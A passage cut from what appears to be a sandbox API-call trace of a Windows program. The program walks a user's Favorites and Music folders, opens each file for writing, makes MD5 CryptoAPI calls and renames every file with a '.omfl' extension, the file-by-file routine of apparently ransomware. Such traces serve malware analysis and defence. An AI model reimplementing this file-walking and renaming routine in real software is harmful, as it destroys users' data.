dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.798] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.798] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.798] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.798] GetLastError () returned 0x0 [0133.798] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.798] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.799] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.799] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.799] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.799] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.omfl")) returned 1 [0133.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.801] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.802] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0133.802] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0133.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0133.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0133.802] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0133.803] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0133.803] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\") returned="H9ZDOLsEHsUNLx\\" [0133.803] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0133.803] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0133.803] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0133.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0133.803] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0133.803] PathFindFileNameW (pszPath="") returned="" [0133.805] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\4fgtWBta67 fi.m4a") returned=".m4a" [0133.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\4fgtWBta67 fi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\4fgtwbta67 fi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.805] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=80935) returned 1 [0133.805] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.809] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.811] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.811] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.811] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.811] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.811] GetLastError () returned 0x0 [0133.811] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.811] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.811] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.811] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.811] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.811] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.814] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\4fgtWBta67 fi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\4fgtwbta67 fi.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\4fgtWBta67 fi.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\4fgtwbta67 fi.m4a.omfl")) returned 1 [0133.815] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.815] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.815] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.816] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.816] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2987250, ftCreationTime.dwHighDateTime=0x1d5e68a, ftLastAccessTime.dwLowDateTime=0x1a5ce650, ftLastAccessTime.dwHighDateTime=0x1d5e3fb, ftLastWriteTime.dwLowDateTime=0x1a5ce650, ftLastWriteTime.dwHighDateTime=0x1d5e3fb, nFileSizeHigh=0x0, nFileSizeLow=0x1544f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aH W4BkCOBnHNElrzQ.mp3", cAlternateFileName="AHW4BK~1.MP3")) returned 1 [0133.816] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\aH W4BkCOBnHNElrzQ.mp3") returned=".mp3" [0133.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\aH W4BkCOBnHNElrzQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\ah w4bkcobnhnelrzq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.817] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=87119) returned 1 [0133.817] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.820] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.821] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.821] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.821] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.822] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.822] GetLastError () returned 0x0 [0133.822] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.822] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.822] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.822] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.822] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.822] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.822] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.824] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\aH W4BkCOBnHNElrzQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\ah w4bkcobnhnelrzq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\aH W4BkCOBnHNElrzQ.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\ah w4bkcobnhnelrzq.mp3.omfl")) returned 1 [0133.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.825] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.827] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9bb4ba0, ftCreationTime.dwHighDateTime=0x1d5da84, ftLastAccessTime.dwLowDateTime=0x8c8e4700, ftLastAccessTime.dwHighDateTime=0x1d5d960, ftLastWriteTime.dwLowDateTime=0x8c8e4700, ftLastWriteTime.dwHighDateTime=0x1d5d960, nFileSizeHigh=0x0, nFileSizeLow=0x16490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CbvVgfCR.m4a", cAlternateFileName="")) returned 1 [0133.827] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\CbvVgfCR.m4a") returned=".m4a" [0133.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\CbvVgfCR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\cbvvgfcr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.827] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=91280) returned 1 [0133.827] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.833] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.834] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.834] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.834] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.834] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.834] GetLastError () returned 0x0 [0133.834] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.834] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.834] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.834] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.834] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.836] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\CbvVgfCR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\cbvvgfcr.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\CbvVgfCR.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\cbvvgfcr.m4a.omfl")) returned 1 [0133.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.837] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.837] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.838] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.838] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x240e79f0, ftCreationTime.dwHighDateTime=0x1d5dc5f, ftLastAccessTime.dwLowDateTime=0x1452feb0, ftLastAccessTime.dwHighDateTime=0x1d5db14, ftLastWriteTime.dwLowDateTime=0x1452feb0, ftLastWriteTime.dwHighDateTime=0x1d5db14, nFileSizeHigh=0x0, nFileSizeLow=0x4d7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FvxBeQHVA_y.m4a", cAlternateFileName="FVXBEQ~1.M4A")) returned 1 [0133.838] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\FvxBeQHVA_y.m4a") returned=".m4a" [0133.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\FvxBeQHVA_y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\fvxbeqhva_y.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.839] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=19835) returned 1 [0133.839] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.842] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.843] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.843] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.843] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.843] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.843] GetLastError () returned 0x0 [0133.843] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.843] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.843] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.843] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.843] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.843] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.843] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.844] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\FvxBeQHVA_y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\fvxbeqhva_y.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\FvxBeQHVA_y.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\fvxbeqhva_y.m4a.omfl")) returned 1 [0133.845] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.845] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.845] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.847] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.847] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a83850, ftCreationTime.dwHighDateTime=0x1d5e57f, ftLastAccessTime.dwLowDateTime=0x9cc16970, ftLastAccessTime.dwHighDateTime=0x1d5e1e1, ftLastWriteTime.dwLowDateTime=0x9cc16970, ftLastWriteTime.dwHighDateTime=0x1d5e1e1, nFileSizeHigh=0x0, nFileSizeLow=0x6cc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GkVrp_9.m4a", cAlternateFileName="")) returned 1 [0133.847] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\GkVrp_9.m4a") returned=".m4a" [0133.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\GkVrp_9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\gkvrp_9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.847] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=27843) returned 1 [0133.847] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.850] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.851] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.851] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.851] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.851] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.851] GetLastError () returned 0x0 [0133.851] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.852] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.852] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.852] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.852] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.854] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\GkVrp_9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\gkvrp_9.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\GkVrp_9.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\gkvrp_9.m4a.omfl")) returned 1 [0133.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.855] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.856] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb42980, ftCreationTime.dwHighDateTime=0x1d5d7dd, ftLastAccessTime.dwLowDateTime=0x256d39f0, ftLastAccessTime.dwHighDateTime=0x1d5e2de, ftLastWriteTime.dwLowDateTime=0x256d39f0, ftLastWriteTime.dwHighDateTime=0x1d5e2de, nFileSizeHigh=0x0, nFileSizeLow=0xd560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JiEs6uFYkdZi3.wav", cAlternateFileName="JIES6U~1.WAV")) returned 1 [0133.856] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\JiEs6uFYkdZi3.wav") returned=".wav" [0133.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\JiEs6uFYkdZi3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\jies6ufykdzi3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.857] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=54624) returned 1 [0133.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.860] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.861] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.861] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.861] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.861] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.861] GetLastError () returned 0x0 [0133.861] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.861] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.861] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.861] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.862] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.862] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.862] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\JiEs6uFYkdZi3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\jies6ufykdzi3.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 